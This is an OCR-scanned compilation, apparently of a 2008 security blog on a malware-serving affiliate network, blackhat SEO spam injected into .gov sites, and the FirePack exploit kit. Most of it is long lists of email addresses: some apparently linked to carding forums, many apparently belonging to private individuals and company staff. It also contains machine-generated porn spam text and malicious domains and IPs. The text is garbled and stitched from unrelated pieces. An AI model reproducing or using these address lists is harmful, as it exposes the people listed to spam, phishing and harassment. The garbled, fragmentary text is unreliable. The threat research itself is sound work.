m612217@gmail.com 
cdsys@mail-guru.net 
rezapj4@gmail.com 


poyamoradi9985@gmail.com 
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mn79000@gmail.com 
lolbossO1@gmail.com 
penningajesper@gmail.com 
tlolbossOL@gmail.com 
tpenningajesper@gmail.com 
vrjpl@hi2.in 
matingh@fastair.info 
thflashshervin@gmail.com 
milad751389@gmail.com 
joker62970@gmail.com 
pirlo007@mozej.com 
sonodahi@siberask.com 
mehran.abasian45@gmail.com 
mnecx@drmail.net 
dojiy@mail-search.com 
trbenjaminblair@gmail.com 
tbrant.g101@gmail.com 
thughboyd88@gmail.com 
tbceebill@bigpond.com 
taaronjbreuer@yahoo.com 
tfelix.banuchi@gmail.com 
ttwitterfutch@gmail.com 
twan.raymond@gmail.com 
tlukasedut@hotmail.com 
tmathieulabrecque91@gmail.com 
nass1123@live.co.uk 
amirhamidihd@gmail.com 
tnathanvincent5@hotmail.com 
tmisterwillroberts@gmail.com 
tsrobi0@yahoo.com 
tbean6754@gmail.com 
trobotskin@hotmail.com 
tpatty sand010@live.com 
tdanm74@gmail.com 
tliloryan09@icloud.com 
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pooya@gmail.com 
xivegey@webhomes.net 
alerem18@gmail.com 
talerem18@gmail.com 
lexey72349@hiwave.org 
yobegod@inappmail.com 
ncopper _top2010@live.com 
nrgladspriest@gmail.com 
noliver.wissett@btinternet.com 
nvairchris@ymail.com 
alitala928@gmail.com 
amiramir134@gmail.com 
44zy5@O0mixmail.info 
m.shoobi@yahoo.com 
mengele@shadowcrew.com 
onthefringe@mailvault.com 
deck@mailvault.com 
thecatreturn@hotmail.com 
throwingup@cornerpub.com 
hawk44@ziplip.com 
JDawg53@ziplip.com 
quickstop@ziplip.com 
switch _crew@yahoo.com 
kk@prozvon.us 
FraMd323@mailvault.com 
the _casino@safe-mail.net 
ohiogrouprep@yahoo.com 
Sales@uBuyWeRush.com 
eddie 123@hotmail.com 
marlboroultra@ziplip.com 
zoocircle@mailvault.com 
CtrlAltDelete@ziplip.com 
flossboi@yahoo.com 
akihikotobe@ziplip.com 


krs.saint@ziplip.com 
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pelicanl978@hushmail.com 
TERRYMCCLURY@yahoo.com 
kingpin123@ziplip.com 
ahmed95@yahoo.com 
bitmap@ziplip.com 
PersistenceMD@general-hospital.com 
vinnydelneg12@aol.com 
misc323@yahoo.com 

the _brainl13@mailvault.com 
anita@soverenity.com 
kidhood617@yahoo.com 
ni69az@yahoo.com 
pathrowbacks@hotmail.com 
hpouches@yahoo.com 
hermil@mailvault.com 
ncxvi@netzero.net 

nobody never _someone@yahoo.com 
davidruiz@safe-mail.net 
docum333@yandex.ru 
zvi@safe-mail.net 
mastersmash@safe-mail.net 
neo997c@ziplip.com 

Hing _R@yahoo.com 

nobita thecorrs@hotmail.com 
forgottenfromlithuania@hotmail.com 
JohnDepp@ziplip.com 
nebkin@hotmail.com 
discows@hotmail.com 
yuswanyusoff@yahoo.com 
banditl1369@yahoo.com 
Omar@bassami.be 
G-MoNeY@mailvault.com 
drugstorecowboy 84@yahoo.co.in 
gness820@hotmail.com 


angelodeca@msn.com 
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nouvou@ziplip.com 
review@shadowcrew.com 
apksc@satline.net 

playbot php@hotmail.com 
hateu@s-mail.com 
Alusi03@yahoo.com 
globalflux@hotmail.com 
tribute@hush.com 
DiamondBricktop@aol.com 
tonyjay9@hotmail.com 
miroquesada8@hotmail.com 
pimpano joke@hotmail.com 
deebo4money@hotmail.com 
dumpdisgusting@ziplip.com 
advance@docemail.com 
MrCaliMan@ziplip.com 
none@noen.com 
nineteneleven@ziplip.com 
workingclasswho@hotmail.com 
bussines@lIhconline.net 
veg@mailvault.com 
extrabrom@mail.ru 
ncxvi@hotmail.com 
ncxvi@yahoo.com 
ncxvi@aol.com 
nofearlk2000@yahoo.ca 
eyeh8umofo@yahoo.com 
moneytalks@mailvault.com 
allensapp5@hotmail.com 
nicolaihel _moth@hotmail.com 
goldcard@mailvault.com 
amin _swe@msn.com 
freddy@internetdrive.com 
floydgondolli@mailvault.com 


asian O0O00@mail.ru 
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Monolithic@mailvault.com 
stopal23@hotmail.com 
musclanis@yahoo.com.au 
hyatt _investments@ziplip.com 
Deathr2003@yahoo.com 
gunsandmonkeys@yahoo.com 
grildo@mailblocks.com 
cashiers@gmail.com 
cas@mad.scientist.com 
spidymandil@yahoo.com 
uncapped@bluebottle.com 
fatman@s-mail.com 
grizza@grizza.co.uk 
safeharbor@eBay.com 
trdact@spray.se 
ncryptd@hotmail.com 
chuckledout@skim.com 
Chak _Red@hotmail.com 
expatriot@yandex.ru 
knOwn _prO@hotmail.com 
visaexpertl1986@yahoo.com 
2gangsta4u@mail.com 
mobg666@hotmail.com 
humdyDUMPdy@ziplip.com 
track1@ziplip.com 
ramsesdoesit@yahoo.com 
idi@ziplip.com 

cool _slav@yahoo.co.uk 
Dron1@safe-mail.net 
rayjacko2000@yahoo.com 
builtthekid@Yahoo.com 
greekbOy@hotmail.com 
devilbbt@yahoo.com 
brothaman285@yahoo.com 
monaked99@yahoo.com 
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195.93.218.25/kam/index.php 
xtraff.biz/ads2.htm loads : 


todub.com/tod.php?username=kamilet (72.167.54.150) 
search-fantasy.info/go.php?u=fxlayer (208.109.178.115) 
netsearch.cc/go.php?u=fxlayer (208.109.90.122) 
upperhits.com/index.php?id=kamilet (72.52.154.96) 
itsptp.com/promote.php?uid=160 (72.232.241.20) 
validall.com/portal.php?ref=kamilet (207.150.179.58) 
feisearch.com/portal.php?r=0 &username=fxlayer (63.246.133.63) 
g2xml.com/portal.php?r=0 &username=kamilet (74.86.191.98) 


xtraff.biz/ad3.htm loads : 


utracker.pl/stat.php 
xtraff.biz/filtercountry.php 


Upon registering at the second affiliate program, the participant is asked to use the 
following URL to redirect traffic to asearchfor.com/search.php (207.226.164.195); getmy- 
search.com/search.php (207.226.164.195); merrysearch.com (207.226.164.194). Known 
domains/IPs with bad reputation. It gets even more interesting as we try to further expand the 
affiliate program under the many other different domain names they use such as : 


buckspacks.com 
serious-partners.com 
real-bucks.com 
funsempire.com 
czcash.com 
extreme-traffic.net 
funsempire.com 
risecash.com 
favouritecash.com 
xxl-cash.com 
partner.loveplanet.ru 
partner.gameboss.ru 


Why would they bother sharing the revenues with other parties at the first place? To 
hedge of risk of getting caught serving malware directly, so what they’re basically doing is 
risk-forwarding the serving process to each and every participant in the affiliate network. The 
bottom line - xbanners.biz is a frontend to xtraff.biz’s malicious practices, and xtraff.biz itself 
is a frontend to FunPPC.com, among the many affiliate programs that once establishing trust 
with a web site owner, start abusing it by randomly serving live exploir URLs and dropping 
malware. 


1. http: //ddanchev. blogspot .com/2007/10/incentives-model-for-pharmaceutical .htm 


2. http://ddanchev.blogspot .com/2007/12/have-your-malware-in-timely-fashion. html 
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callmeafr@ziplip.com 
Xxxxgold@ziplip.com 
fourex _gold@hotmail.com 
raiden@s-mail.com 
mathpro@ziplip.com 
Ducati@mailvault.com 
hkssuprarx@hotmail.com 
Inemb21@aol.com 
babaich2000@yahoo.com 
babaich@hotmail.com 
azseller1@yahoo.com 
archi@fakeidscan.info 
xdirc@hotmail.com 
fore50@hotmail.com 
charles111@pochtamt.com 
sf underground@mll.net 
intnibroker@yahoo.com 
darknumber@ziplip.com 
przp@hotpotmail.com 
zantekibigami@gmail.com 
licO@safe-mail.net 
icO@mailvault.com 
riddick@mailvault.com 
dragon4euro@yahoo.com 
devlin townsend@yahoo.com 
Angelic _Enterprising@hotmail.com 
agc116@aol.com 
thanh2099@gmail.com 

azn _thanh@hotmail.com 
thcdumps@yahoo.com 
b@wassup.zzn.com 

billion _dollarz@yahoo.com 
red _r6_rider@hotmail.com 
bxk901@hotmail.com 


neolix@hotmail.com 
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mike _ramona2000@yahoo.ca 
ester9321@mail.com 
maksik466166@hotmail.com 
dextro55@yahoo.com 
auto461353@hushmail.com 
oluwol@hotmail.com 
oluwonoah@yahoo.com 
whitehawk@mailvault.com 
looking4chaos@yahoo.com 
joe _quarterback@hotmail.com 
holyy _sinna@hotmail.com 
rickky@mailvault.com 
relbenumberone@gmail.com 
quentin@bk.ru 
daveycrokkit8555@yahoo.com 
spinwall@usa.com 
draiv50@mail.ru 
ninjax123@walla.com 
ninjax123@hotmail.com 
illicit Lone@yahoo.com 
kush10153@hotmail.com 
coleycole234@yahoo.com 
Xzaulst@aol.com 
auto97702@hushmail.com 
vseh _ebut@yahoo.com 
kbolotin@pisem.net 
Peggs1616@yahoo.com 
bulkmails@tom.com 
reabbyhas@yahoo.com 
m073@jokeemail.com 
m073@hotmail.com 
FingHal@gmail.com 
seeegone@aol.com 
kawasaki@takas.It 


frankpumma@yahoo.com 
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x-minister@minister.com 
jakethelake@hotmail.com 
craptacular@mailvault.com 
kid a55@hotmail.com 
hoppsansalqaz@hotmail.com 
astwave@yahoo.com 
xen@matrix-relOaded.com 
johnnylogic@mailvault.com 
marcelol0800@chetumail.com 
speakofthedevil4@hotmail.com 
starssky78@hotmail.com 
mrplastic@mailvault.com 
glaxxus22@hotmail.com 
nuffideas@yahoo.com 
shenmue0011@hotmail.com 
athbrandon@cox.net 
fredmeyers@walla.com 
dcarter124@yahoo.com 
strongboy12345@yahoo.com 
Ju87s@ziplip.com 
source4cc@ziplip.com 
mill.tech@btconect.com 
TheBestofBC@ziplip.com 
darkrain@hush.com 
knowledgeableone@quixer.com 
barakirs@netvision.net. il 

Flip 9@excite.com 
slobodan2002@mail.ru 
tron@xep.info 
usadumps@hush.com 
reseller@mailvault.com 
webappsec@securityfocus.com 
slayer@kraix.com 
blackops123@usa.com 
mvpgear@cyber-rights.net 
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agentsmith@SAFe-mail.net 
fruitsandboners@cyber-rights.net 
stO0per@ip3.com 
fruitsandboners@mailvault.com 
mwdropout@ziplip.com 
cwellington007@aol.com 
gaysrv@hotmail.com 
admin@hpouches.ne 
misc@holopouches.com 
admin@Holopouches.com 
phonesupport@holopouches.com 
Xanimals@ziplip.com 
importuner@ziplip.com 
foobar@evil.com 
mrincognito@mailvault.com 
primesuspect@sealand.pmmit.com 
admin@albahost.net 

Isaac Office@mailvault.com 
Isaac _Office@safe-mail.net 
Isaac Newton@safe-mail.net 
bla@dodgeit.com 
want@dodgeit.com 
phador@mailvault.com 
moonshine@cyber-rights.net 
sqadmin@archdiocese-no.org 
www.goodsite.com@www.badsite.com 
trevisberry@yahoo.com 
winblev@pisem.net 
plasticman@mail.ru 
belikechazz@aol.com 
troy4work@ziplip.com 
TGBLIXT@Hotmail.com 
gloomel1@linuxmail.org 
Gloomer@linuxmail.org 
gloomer@australia.edu 
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plazma _mail@yahoo.com 
sonyvaio@hushmail.com 
lancelotlink@ziplip.com 
mhall@netcom.com 
dogwood70@ziplip.com 
dgordon@wachoviasec.com 
cps@keptprivate.com 
chbigben@ziplip.com 
pvthc@ziplip.com 
Deck@ziplip.com 
ilithiumi@ziplip.com 
nhlaxus@ziplip.com 
khameleon@ziplip.com 
fakelDusa@ziplip.com 
thelandonly@ziplip.com 
astoria@s-mail.com 
nosferatoo@ziplip.com 
nosferatoo@jabber.org 
oofzpoumba3@yahoo.com 
hayden schwarz@yahoo.com 
nOwa _strada@yahoo.com 
kalina007@ziplip.com 
wolfram@consultant.com 
abuse@xo.com 
ipadmin@eng.xo.com 
pastry@mailvault.com 
validater@ziplip.com 
pp@dzingler.org 
lex@flashmail.com 
codec@cypher.com 
spyace@mindvox.phantom.com 
blackjack4@spymac.com 
marciano4949@yahoo.com 
dpharmal@yahoo.com 


scott992@usa.com 
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Dron123@s-mail.com 
Dron@ziplip.com 
datatrada@ziplip.com 
kkimmel@terroristsupply.com 
real _carding@mail.ru 
boaservice@bonbon.net 
klykva@phreaker.net 
carders.online@carders.zzn.com 
maz78@mail2world.com 
samsung@mail2world.com 
clone _x@hotmail.com 
jfaruge@tokyo.com 
smek4juju@iprimus.com.au 
refy@ziplip.com 

shed _skin@hotmail.com 
poika@mail.ru 
jager@e-mail.ru 
Admin@shadowcrewl1.com 
no-reply@shadowcrew.com 
dddswordddd@yahoo.co.uk 
Opiate@ziplip.com 
Admin@darker-world.com 
player4sure@ziplip.com 
webmaster@oderalot.net 
darker _world@hotmail.com 
01@www.shadowcrew.com 
sosososos@domain.com 
novalogico@nycny.net 
aw-accounts@amazon.com 
vcmike@x-changers.com 
leek@europe.com 
prospect@ziplip.com 
Super-duperman@ziplip.com 
omnipay@safe-mail.net 
goldplastics@ziplip.com 
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biggiboyy@yahoo.com 
marcus11@ziplip.com 
smk@skatemanknight.com 
robert.e.fleissner@us.pwcglobal.com 
compile by _selflex@gmail.com 
slpdck@yahoo.com 
slipperdick@mailvault.com 
malicO3@fastmail.fm 
graph@dumpsmarket.cc 
digital bullet@msn.com 
selflex@gmail.com 
cvvbudlite@ziplip.com 
nick@yahoo.com 
sendmail-bugs@sendmail.org 
rikul7@yahoo.com 
mr _luciano@s-mail.com 
quadzaquadz@yahoo.com 
romanhomer@aol.com 
cardvilla@exploit.im 
Geedee156@gmail.com 
m8dee@protonmail.com 
thehawk350@gmail.com 
cardingqueen2020@gmail.com 
nidalaltl1@gmail.com 
mike.aquax@gmail.com 
Marcuswayne025@gmail.com 
yand123cc@yandex.com 
trujillosammy7@gmail.com 
julia.pcret@exploit.im 
-@xenforo.com 
curry30jb@mail.ru 
igroknomer99@mail.ru 
valera.safonow2014@yandex.ru 
vision777@xmpp.jp 
pol5600@gmail.com 
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evushka1l3A@bigmir.net 
machytka08@rambler.ru 
tottal0@citromail.hu 
maurice _sieling@freenet.de 
griszqa09@interia.pl 
eragon _1997@interia.pl 
tonihok@free.fr 
razor88@freenet.de 
wojnarek002@interia.pl 
erleperle1@freenet.de 
aurevenot@orange.fr 
merlin0011@freenet.de 
andyqu.1@t-online.de 
kiwi341@interia.pl 
kalaksmen2011@yandex.ru 
ali3804@yandex.ru 
mrtook@yandex.ru 
okey.sS@yandex.ru 
katia7631@yandex.ru 
globus555g@yandex.ru 
cinek182@poczta.fm 
sabum@interia.pl 

davio _bear@poczta.fm 
george242@interia.pl 
zibiziom@interia.pl 
m3m3k@interia.pl 
mavman70@frontier.com 
post@stigottar.no 
deanz@bex.net 
nickleback999@att.net 
alakizavalalala323@att.net 
dequantaylor@aol.com 
urakthar@freenet.de 
chris.riley@iol.ie 
account@artbyfarmer.com 
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elidi.courtois@wanadoo.fr 
galahdriell6@web.de 
jochen-h@freenet.de 
manologaming@libero. it 
vanored@yandex.ru 
mehmetsanli1904@hotmail.com 
unscenej@gmail.com 
elderrramos@gmail.com 
g6210018@nwytg.net 
ritawasia@yandex.ru 
thomaskeely311@gmail.com 
rtgtgg@gmail.com 
florian.gamer@t-online.de 
leonginamerkusheva9494@mail.ru 
gorbunova72727@mail.ru 
tomasz.mroczek@interia.eu 
lordfaz@hotmail.com.ar 
blackpointverifl@xmpp.jp 
howalexis@gmail.com 
brandyndusty2007@yahoo.com 
murchan.ka@yandex.ru 
Sscren@yandex.ru 
alex-mts@mail.ru 
ajlekceu4er@gmail.com 
games95@live.no 
17julia91@mail.ru 

melnik _valya@mail.ru 
ergina.mardanyan@mail.ru 
Fylhtq284000@mail.ru 
velisav2015@mail.ru 
cagaraev-abdul@mail.ru 
apkaev.9802@mail.ru 
oleg.mikshenin.1977@mail.ru 
toommybraun@mail.ru 


igor.baikov56@mail.ru 
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mazai200248@mail.ru 
dsheshmnetsev@inbox.ru 
isunkuvortmaihis@mail.ru 
nazar.dzhumagaliev@bk.ru 
kulikov _kostya0@mail.ru 
accmatomy2015@gmail.com 
inogdaoni@mail.ru 
informer@proxygeek.pw 
pomosh-sherts@yandex.ru 
olivermantovani@gmail.com 
achow1996@hotmail.com 
d.karwel@gmx.de 
max0084675@gmail.com 
kmorgancan@gmail.com 
rayneralexander@gmail.com 
jordan.meneut@outlook.fr 
mads _kirk@hotmail.com 
sportzzzzy@gmail.com 
Idavies@aifs.com 
annicka.ericsson@hotmail.com 
shepsoccer@aol.com 
EkLite@exploit.im 
mobilesearch@vipole.com 
simona@zloy.im 
henryha22@mailsearch.net 
mrmycroft@xmpp.jp 

fartik _777@bk.ru 
nastjyatom@yandex.ru 
jiujiO0@yandex.ru 
dalv82@yandex.ru 
dixib4@yandex.ru 
natali.rishkova@yandex.ru 
evseviyseva@yandex.ru 
temycha@yandex.ru 
vernigora.sasha@yandex.ru 
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4.2.12 The Continuing .Gov Blackat SEO Campaign (2008-02-18 22:52) 


The pom star book be a interracial pom often at the business and free cartoon porn. All free 
porn sites have her bonus and latin porn now in his pap ele 
freeporn.eee. bridger-mt. gow206. html - 17k - Cached - Similar ' pags : 

in X- I m 
There be the percent soon. How now look or horse sex play! | produce his adult sex group 
better, and we be the grin too. Own policeman and free pom films ... 
freeporn.eee. bridger-mt.gow54. html - 16k - Cached - Similar pages 


. room 
How actually yahoo adult groups be! You slide the crossing only; i doubt the rule and group 
gay sex again. What wrong ribbon or adult film be! ... 
freeporm.eee. bridger-mt.gow227 html - 16k - Cached - Similar pages 


Foto Porn - sex offender list 

| implement the online sex least, but also they invest his value least. She build the death or 

free porn vids originally, it withdraw their cages and porn .. 

freeporn.eee. bridger-mt. gow567 html - 18k - hed - Similar page 
x - n 

lt make the wornan why. You be their adult personal even, as well as i be that smile and free 

mature sex now. The point have this aim oualy a ist 

freeporn. eee, bridger-mt, gow588. html - 18k - Cached - nilar t ages 


Can it be around white adult friend finder com? A pom site be a thing or black anal sex so in 
the master, not only the culture or 3d sex have the state out ... 
freeporn.eee. bridger-mt. gow612. html - 16k - Cached - Similar pages 


ritn r x Vi - twiligh 
He be no soil or indian porn out. The share and cartoon porn be the shemale sex when by the 
sex cartoons, bat the sex ty leave the manual off of the .. 
freeporn.eee. bridger-mt. gow154 html - 18k - Cached - Similar page 


nes - h 
A gender and porn password go many year yesterday upon the doctor and adult movies, The 
mine and aian por star have the fault or adult movies fucking for... 
freeporn.eee. bridger-mt. gow 157 html - 16k - Cached - Similar pages 


Yahoo Adult - celebn x 

A standard and mobile por want their way or adult erotic gg of the council and free adult 
personals, and the government have the knife and best pom ... 

freeporn. eee. bridger-mt.gow - 24k - hed - Similar pages 


3 


Adul rch- It stor 
What major percent highlight! What simple telephone replace! How just audience and adult 
video stores fly! Do who say on safe election or homemade sex? ... 

freeporn. eee. bridger-mt. gow466. html - 22k - Cached - Similar pages 


Just like the situation in [1]the previous case of [2 ]injecting SEO content into .gov domains, once 
the pages are up and running, they get actively advertised across the Web, again automatically. 
While bridger-mt.gov responds to 72.22.69.184, the subdomain freeporn.eee.bridger-mt.gov 
is pointing to another netblock, in this case 66.49.238.80, exactly the same approach was 
used in a previous such assessment that was however serving malware to its visitors. Here 
are some of the very latest such examples listed by directory : 


- Cobb County Government - cobbcountyga.gov/css - over 2,240 pages 

- Benton Franklin Health District - bfhd.wa.gov/search/templates/dark/.thumbs - 1,200 pages 
- Bridger, Montana - freeporn.eee.bridger-mt.gov - 778 pages 

- Mid-Region Council of Governments - mrcog-nm.gov/includes/phpmailer/language - 336 
pages 
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linney2011@yandex.ru 
marysya09@yandex.ru 
prokopevartyom@yandex.ru 
schantropov@yandex.ru 
sercas89@yandex.ru 
makc2113@yandex.ru 
ilona2208@yandex.ru 
annleel@yandex.ru 
denlden7@yandex.ru 
orfanrzaev2013@yandex.ru 
psyshit4ever@yandex.ru 
oilman87@yandex.ru 
a.bo4manov@yandex.ru 
malanin.serg@yandex.ru 
rhenzuflfyz@yandex.ru 
gorbunevsergey@yandex.ru 
devilhuntt@yandex.ru 
morelyak@yandex.ru 
vmg52449@bcaoo.com 
linaadinan@aol.com 
anubisddos@xmpp.jp 
—-sipettit@googlemail.com 
—-single eric@hotmail.com 
—-siucheonghung@gmail.com 
—-silver.wood@hotmail.com 
paschal992@mail.ru 
icevendetta97@mail.ru 
zmei00@bk.ru 
senior.fedosov77@yandex.ru 
19760111@rambler.ru 
liona67@mail.ru 
laserrefiller@yahoo.com 
yousef07dz@gmail.com 
evdokiasus1988@yandex.ru 
bot@wwh.so 
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aleks.schuljenko@yandex.ru 
motogp2008@yandex.ru 
tatkannn@yandex.ru 
voronov966@yandex.ru 
jakobletienne@online.de 
cecilia.griessel@bhpbilliton.com 
andrew.dutney@flinders.edu.au 
smash.fomichev@yandex.ru 
mmaker@xabber.org 
grownpad337@mail.ru 
Pilfos@gmail.com 
J.kamphorst@hotmail.com 
ggggwwww123@hotmail.com 
Chris _m_rees@hotmail.com 
alinabhb1969@mail.ru 
german-shnayder@ro.ru 
1911froct@gmail.com 
Sergio2712@rambler.ru 
kasranewss@gmail.com 
edgardedgard2006@gmail.com 
vladimirdigl@gmail.com 
desperoz@jabber.ru 
vasilia72@mail.ru 
vasilia221@mail.ru 
login@yandex.ru 

dino 8194@hotmail.com 
tlauer28@gmail.com 
rtysonek@live.com.au 
jennylynn123@gmail.com 
anoopjylive@gmail.com 
antonioascione@hotmail.com 
djdarkdragon3@hotmail.com 
yves.deroux@aliceadsl.fr 
rob0132@free.fr 
arve@hellesoy.net 
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darcon18@t-online.de 
podvalenuy21@gmail.com 
vu4ik@mail.ru 
agakaryan.arshak@outlook.com 
ari.tampasis@ametek.com 
gosha.bogolei@mail.ru 
kolya@mail.ru 
legit.carder2001@skype.com 
besttrader43@gmail.com 
firemanl112@xmpp.jp 
greatswine@cox.net 
brichardson14@cox.net 
typetheseletters@cox.net 
Rickfolk@cox.net 
pipi2285@bk.ru 

ivan _istomin90@mail.ru 
dasdsa1910@bk.ru 
zmolchan@mail.ua 
aleksej1212@inbox.ru 
hrushvytskyi@mail.ru 
danjas1976@mail.ru 

maks _litvinenko 98@mail.ru 
bassara35@mail.ru 
lesakov.danya@yandex.ru 
masha _ekgardt@mail.ru 
igor 2005c@mail.ru 
skream79@bk.ru 

kh _73@mail.ru 
sergei.gorshenin@bk.ru 
lihoi.04@mail.ru 
maksim01929@yandex.ru 
taras.promo@yandex.ua 
gegefredmes@free.fr 
email979@bk.ru 
wtpmjgdal9945@gmail.com 
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cat15061972@yandex.ru 
malik141201@gmail.com 
valkier2002@gmail.com 
kupachal0@gmail.com 
matfar2@yandex.ru 
bakhmach-sasha@rambler.ru 
alinochka.artemova.88@bk.ru 
tobechukwuezewulu@gmail.com 
kokain@jwchat.org 
mep@exploit.im 
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- Michigan Senate - senate.michigan.gov/FindYourSenator/top - 26 pages 

- Nevada City, California - nevadacityca.gov/postcards - 13 pages 

- Brookhaven National Laboratory - pvd.chm.bnl.gov/twiki/pub/Trash/OnlinePharmacy - 12 
pages 


Who's behind all of these? Checking the outgoing links and verifying the forums the adver- 
tisements got posted at could prove informative, but for instance, topsfield-ma.gov/warrant 
where a single blackhat SEO page was located seems to [3]have been hacked by a [4]turkish 
defacement group who left the following - "RapciSeLo WaS HeRe !!! OwNz You - For Avci- 
Hack.CoM with greets given to "JOk3R inf3RNo ByMs-Dos FuriOuS SSeS UmuT SerSeriiii Ov3R 


YstanBLue DeHS@ CMD 3RROR SaNaLBeLa Keyser-SoZe GoLg3 JOk3ReM JackalTR Albay ParS 
MicroP" 


1. ft ip://ddanchev, blogspot. con/2007/10/ compronised-sites-serving-malvare-and btal 
2. http: //ddanchev.blogspot . com/2007/11/pOrngov-ongoing-blackhat-seo-operation html 
3, http://ddanchey blogspot. con/2007/11/overperforning-turkish-hacktivists html 

4. http://adanchey blogspot .con/2007/11/nass~defacenent-by-turkish-hacktavists. bial 


4.2.13 The FirePack Web Malware Exploitation Kit (2008-02-20 15:37) 


Statistics 


In a typical tactical warfare from a marketing perspective, malicious parties are fighting for 
"hearth share" of their potential customers through active branding like the case with this 
malware kit. In a frontal competition attack aimed at [1]lcePack, the authors of FirePack are 
pitching yet another "copycat" web exploitation malware kit for purchase at $3,000. Why 
a copycat anyway? Mainly because it lacks any major differentiation factors next to both, 
[2]lcePack and [3]MPack, except of course the different javascript obfuscation technique used. 
As in the majority of open source malware kits, their "modularity" namely easy for including 
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new exploits and features within, is perhaps what makes assessing the impact of malware kits 
permanently outdated - a kit that you’re assessing today has already been improved and new 
functionalities added in between. 


The business strategies applied for such a hefty amount of money, are the lack of trans- 
parency means added biased exclusiveness, in order to [4]cash-out through high-profit 
margins while taking advantage of the emerging malware kits [5]cash bubble. A bargain 
hunter will however look for the cheapest proposition from multiple sellers, or subconsiously 
ignore the existence of the kit until it leaks out, and turns into a commodity just like MPack 
and IcePack are nowadays. 


Related posts : 

[6]The WebAttacker in Action 

[7]Nuclear Malware Kit 

[8]The Random JS Malware Exploitation Kit 
[9]Metaphisher Malware Kit Spotted in the Wild 
[10]The Black Sun Bot 

[11]The Cyber Bot[12] 
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. http: //ddanchev. blogspot . com/2007/03/underground- economys~ supply- of goods . htm] 
_fcep://atanche blogspot .con/ 2007/06 eebattackar~in-action hel 
"hvtp://adanchev. blogspot cos/2001/06/nclear-nalare-Xit tal 


ttp://ddanchev. blogspot .com/2008/01/random- js-malware-exploitation-kit .htm 


OMONAURWNH 


ttp://ddanchev. blogspot .com/2007/11/metaphisher-malware-kit-spotted-in-wild. html 


samudralas@hexaware.com 
muraleedharav@hexaware.com 
prabhuna@hexaware.com 
ashleshaa@hexaware.com 
susmitam@hexaware.com 
kumarp@hexaware.com 
sushants@hexaware.com 
rashmig@hexaware.com 
prakashg@hexaware.com 
sriramsn@hexaware.com 
shanmukhab@hexaware.com 
kalas@hexaware.com 
madhvip@hexaware.com 
hemantsu@hexaware.com 
pradub@hexaware.com 
uday@hexaware.com 
guptam@hexaware.com 
anupamkumar@hexaware.com 
dkeegan@hexaware.com 
anurags@hexaware.com 
vinothr@hexaware.com 
kumaranmohanasundaramg@hexaware.com 
SainathS@hexaware.com 
janem@hexaware.com 
VenkateswaraS@hexaware.com 
senthilkumarj@hexaware.com 
hanumantk@hexaware.com 
judithm@hexaware.com 
PranilB@hexaware.com 
nitins@hexaware.com 
max.sitkar4uk@yandex.ru 
pi _project@interia.pl 
dnz77@interia.pl 
petr.stemberaa@seznam.cz 
djpetrox@interia.pl 

13013 


szaman10@interia.eu 
landorin@interia.pl 
patrykopI1@interia.eu 
muminek538@interia.pl 
thulee@interia. pl 
poszu1236@interia.pl 
szara_myszka _xx@interia.pl 
hochlik123@interia. pl 
sobczyk005@interia.pl 
ami91p!l@interia.pl 
michalek _gorka@interia.eu 
mohitos@interia. pI 
ggggghq@21cn.com 
cycubom@interia.pl 
blud.pl@interia.eu 
m.zuziak@interia. pl 

lee _taylor20@yahoo.com 
filip1124@interia.pl 
jarek15stefanski@interia.pl 
sczaus@interia.pl 
sebawro@interia.pl 
provi994@interia.pl 
pitbull32@interia.pl 
rafv@poczta.fm 
kluska06@interia.pl 
fatallty@interia.eu 
kyle@interia.eu 
kaja.marcinkowska@poczta.fm 
emilianO01@interia.pl 
adriano21@poczta.fm 
pavelak14@interia.pl 
eryq@interia.pl 
dawid.lakomy@interia.pl 
biankar1@interia.eu 
m.maly20@interia.pl 
13014 


bartek cymerys@poczta.fm 
bert123456@interia.pl 
jjayjoker123456789@interia.pl 
axator14@interia.pl 
misiek _212@interia.pl 
dartmoor67@interia.pl 
simon _ild@interia.pl 
kubasobul@interia.pl 
michal07901@interia.pl 
nokitel@numericable.fr 
misieksztum@interia.pl 
raffael@pottenbrunn.at 
natol79@interia.pl 
grzesiek313@poczta.fm 
haspat@interia.pl 
jarekg2502@interia.pl 
raflikdziubek@interia. pl 
pereziom1221@interia.pl 
mateq10@interia.pl 
fadrian@poczta.fm 
r.ossowski@interia.pl 
jiangbeipzgacg@21cn.com 
jacekbdt@interia.pl 
valard@interia.pl 
rokil513@interia.pl 
jarol9700@interia.pl 
qbas ek@interia.pl 
kuuba96@interia.pl 
konterkamilz34@interia.eu 
vercetti@poczta.fm 
kaczor943@interia.pl 
mikolaj113@interia.pl 
toxic.twin@interia.pl 
tekwondoitf@interia.pl 
berkal3@interia.eu 

13015 


k3rmit@interia. pl 
matejas123@interia.pl 
ener215@interia.pl 
luki25@interia.pl 
adamft@interia.pl 

jok bez _jonder@interia.pl 
matthew _99@interia.pl 
bap2410@homechoice.co.uk 
metin12211@interia.eu 
kuba _tokarczyk@interia.eu 
patrykw1712@interia.pl 
serul6p4@interia.pl 
basia0410@interia.pl 
srebny23@interia.pl 
kajot12555@interia.pl 
orangepatryk34@interia.pl 
gokuxssj2@interia.pl 
ivan91@interia.pl 
elpe13@poczta.fm 
sloik258@interia.pl 
raistO9@interia.pl 
cosmo2@buckeye-express.com 
mojehaslo9@interia.pl 
osur@interia.pl 
krzysiuus@poczta.fm 

wojo _wnik@interia.pl 
kurtw@interia.pl 
phytopharmO0@interia. pl 
dawidfischer@poczta.fm 
dominiiko@interia.pl 
Iwasek@interia.pl 
irekol@interia.pl 
lolitakarol@interia.pl 
bartek5692@interia.pl 
michalzak92@interia. pl 
13016 


beczikos@wp.pl 
cyberpablo@interia.pl 


dominikpiotrowski@interia.eu 


grosik345@interia.pl 
asusic@email.cz 
kakaa122@interia.pl 

j _szwajczak@interia.pl 
bobekbo@interia.pl 
kysio26@interia. pl 
mrmedieval@interia.pl 
gosttek@interia.pl 
patryho@interia.eu 

jack _daniels81@interia.pl 
mafiozo.boss@interia.pl 
viipanzer@interia.pl 
mariolamarcin@interia.pl 
bocho93@interia.pl 
tadeusz89@interia.pl 
mrbones@interia.pl 

dj _moro@interia.pl 
miodzios@interia.pl 
tiptopinho@interia.pl 
burza1996@interia.pl 
konopkadesign@interia.pl 
korbel@interia.eu 
florek1997@interia.pl 
janeka9@interia.pl 
jareks101@interia.pl 
didier_drogba@poczta.fm 
marcjnl@poczta.fm 
gajecki246@interia.pl 
pmielniczek@interia.pl 
evilbloob@interia.pl 
qianpairsdcsg@21cn.com 


mimochod1@interia. pl 


13017 


krakowskits@interia.pl 
hugasek4@interia.pl 
mewal1997@interia.pl 
kik321@interia. pl 
mala.lodzka@interia.pl 
sunzel@freenet.de 

